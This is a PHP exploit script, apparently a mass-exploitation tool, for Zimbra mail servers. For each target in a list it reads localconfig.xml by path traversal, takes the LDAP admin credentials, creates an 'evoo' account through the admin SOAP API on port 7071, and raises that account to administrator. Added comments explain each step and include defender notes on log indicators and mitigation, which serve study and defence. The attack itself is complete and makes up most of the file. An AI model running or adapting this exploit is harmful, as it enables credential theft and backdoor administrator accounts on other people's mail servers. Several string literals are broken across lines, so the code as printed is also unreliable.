- <?php
- // Created by L3xcode - CybeerXploit
- // big thx to: magn0m.
- // Recoded By : l3xcode
// Disables all PHP error reporting for the rest of the script, so failed
// requests, missing captures and undefined offsets below produce no output.
- error_reporting(0);
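/**
 * Returns the text that sits between two delimiters in a string.
 *
 * The closing delimiter is searched for only after the end of the opening
 * delimiter. If either delimiter is missing, or the closing delimiter does
 * not occur after the opening one, FALSE is returned instead of a slice
 * computed from a failed search.
 *
 * @param string $param Text to search.
 * @param string $kata1 Opening delimiter.
 * @param string $kata2 Closing delimiter.
 * @return string|false Text between the delimiters (possibly empty), or FALSE.
 */
function ambilKata($param, $kata1, $kata2){
    $open = strpos($param, $kata1);
    if ($open === false) {
        return false;
    }

    $start = $open + strlen($kata1);

    // strpos() yields false when the closing delimiter only appears before
    // the opening one; using that in arithmetic would give a negative length
    // and an unrelated substring, so it is rejected explicitly.
    $end = strpos($param, $kata2, $start);
    if ($end === false) {
        return false;
    }

    return substr($param, $start, $end - $start);
}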
/**
 * Sends $post as an HTTP POST body to $url with cURL and returns the response.
 *
 * Redirects are followed and a fixed Firefox 32 User-Agent string is sent.
 * Certificate and hostname verification are both switched off, so the peer
 * is never authenticated. Cookies are read from and written to a file named
 * "coker_log" in the current working directory. The handle is not closed
 * explicitly.
 *
 * @param string $url  Endpoint to post to.
 * @param mixed  $post Value handed to CURLOPT_POSTFIELDS.
 * @return string|false Result of curl_exec(): the response body, or FALSE on failure.
 */
function ngecek($url,$post){
    $handle = curl_init((string) $url);

    // Options are applied one by one, in the same order as listed.
    $options = [
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_FOLLOWLOCATION => 1,
        CURLOPT_USERAGENT      => "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0",
        CURLOPT_SSL_VERIFYPEER => 0,
        CURLOPT_SSL_VERIFYHOST => 0,
        CURLOPT_POST           => 1,
        CURLOPT_POSTFIELDS     => $post,
        CURLOPT_COOKIEJAR      => 'coker_log',
        CURLOPT_COOKIEFILE     => 'coker_log',
    ];
    foreach ($options as $option => $value) {
        curl_setopt($handle, $option, $value);
    }

    return curl_exec($handle);
}
// Wraps a request fragment in a SOAP envelope whose header context carries
// an auth token.
//   $toket - token placed inside <authToken> in the header context.
//   $req   - XML fragment placed inside <soap:Body>.
// Returns the envelope as a string. Both values are interpolated as-is, with
// no XML escaping.
- function nganu_body($toket,$req){
- $body = "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra
- \"><authToken>$toket</authToken></context></soap:Header><soap:Body>$req</soap:Body></soap:Envelope>";
- return $body;
- }
// Main routine. For each entry in the list file it requests Zimbra's
// localconfig.xml through a path-traversal value in the `skin` query
// parameter, extracts zimbra_user / zimbra_ldap_password from the response,
// authenticates to the admin SOAP service on port 7071, creates an account
// and then marks that account as an administrator.
//
// Defender notes (all derived from the requests built below):
//  - Web/proxy logs: requests for a "res/...js.zgz" resource whose `skin`
//    parameter contains "../" sequences and a trailing "%00".
//  - Admin service: AuthRequest, GetAllDomainsRequest, CreateAccountRequest
//    and ModifyAccountRequest arriving on port 7071 from an unexpected source.
//  - Accounts: this copy uses the fixed name and password "evoo"; an
//    unexpected admin account is the lasting artifact on the server.
//  - Mitigation: run a Zimbra release in which the `skin` traversal is fixed,
//    keep port 7071 reachable only from management networks, and rotate the
//    LDAP password if localconfig.xml may have been read.
- if($argv[1]==""){
- echo "\nusage: php exploit.php list.txt\n\n";
- }
- else{
// Reads the list file named on the command line; "@" hides read errors.
- $target=@file_get_contents($argv[1]);
- $ss=explode("\r\n",$target);
- foreach ($ss as $links){
// Hard-coded name and password of the account created later on.
- $user_baru = "evoo";
- $pwd_baru = "evoo";
// Resource path whose `skin` parameter climbs out of the web root to
// /opt/zimbra/conf/localconfig.xml and ends in an encoded NUL byte.
- $lfi = "res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?
- v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
- $link_lfi = "$links/$lfi";
- echo "=> $links\n";
// GET request with redirects followed, TLS peer/host verification disabled,
// gzip decoding enabled, and cookies kept in a local file named coker_log.
- $ch2 = curl_init ("$link_lfi");
- curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101
- Firefox/32.0");
- curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch2, CURLOPT_ENCODING, "gzip");
- curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
- $ambil = curl_exec ($ch2);
// Splits the response on the marker that precedes each key and captures the
// first <value> element that follows it.
- $get_user = explode('<key"]="name=\"zimbra_user\">', $ambil);
- preg_match('/a\["<value>(.*?)<\/value>/', $get_user[1], $user);
- $get_pwd = explode('<key"]="name=\"zimbra_ldap_password\">', $ambil);
- preg_match('/a\["<value>(.*?)<\/value>/', $get_pwd[1], $pwd);
// `or` binds more loosely than `!=`, so this reads as
// `$user[1] or ($pwd[1] != "")`: true when either capture is non-empty.
- if($user[1] or $pwd[1] != ""){
- echo "[+] Pulen nih...\n";
// Admin AuthRequest carrying the values captured from localconfig.xml.
- $body = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
- <env:Envelope xmlns:env=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:ns1=\"urn:zimbraAdmin\"
- xmlns:ns2=\"urn:zimbraAdmin\"><env:Header><ns2:context/></env:Header><env:Body><ns1:AuthRequest><account by=\"name\">$user
- [1]</account><password>$pwd[1]</password></ns1:AuthRequest></env:Body></env:Envelope>";
// Admin SOAP endpoint on port 7071.
- $link = "https://$target:7071/service/admin/soap";
- $token = ngecek($link,$body);
- preg_match('/<authToken>(.*)<\/authToken>/', $token, $toket);
- if($toket[1]==""){
- echo "[-] gagal ngambil token\n\n";
- break;
- }
- else{
// Lists domains and keeps the first zimbraDomainName that matches.
- $req = @("<GetAllDomainsRequest xmlns=\"urn:zimbraAdmin
- \"></GetAllDomainsRequest>");
- $body2 = nganu_body($toket[1],$req);
- $liat = ngecek($link,$body2);
- preg_match('/<a n=\"zimbraDomainName\">(.*?)<\/a>/', $liat, $domain);
- echo "[+] Creating Account...\n";
// Creates the hard-coded account in that domain and captures its id.
- $req2 = "<CreateAccountRequest xmlns=\"urn:zimbraAdmin\"><name>$user_baru@$domain
- [1]</name><password>$pwd_baru</password></CreateAccountRequest>";
- $body3 = nganu_body($toket[1],$req2);
- $liat2 = ngecek($link,$body3);
- preg_match('/account id="(.*)" name="/', $liat2, $new);
// Sets zimbraIsAdminAccount to TRUE on the new account. The response is
// stored but never checked before success is reported.
- $req3 = "<ModifyAccountRequest xmlns=\"urn:zimbraAdmin\"><id>$new[1]</id><a n=
- \"zimbraIsAdminAccount\">TRUE</a></ModifyAccountRequest>";
- $body4 = nganu_body($toket[1],$req3);
- $liat3 = ngecek($link,$body4);
- echo "[+] Sukses\n";
- echo "[+] Login Url: https://$target:7071/zimbraAdmin/\n# Account: $user_baru@
- $domain[1]\n# Password: $pwd_baru\n\n";
// Appends the same summary to hasil.txt in the working directory; together
// with coker_log this file is an artifact left on the machine running the
// script.
- $fp = fopen('hasil.txt', 'a+');
- fwrite($fp, "[+] Login Url: https://$target:7071/zimbraAdmin/\n# Account: $user_baru@$domain[1]\n# Password:
- $pwd_baru\n\n");
- fclose($fp);
- }
- }
- else{
- echo "[-] ngk pulen\n";
- }
- }
- }
- ?>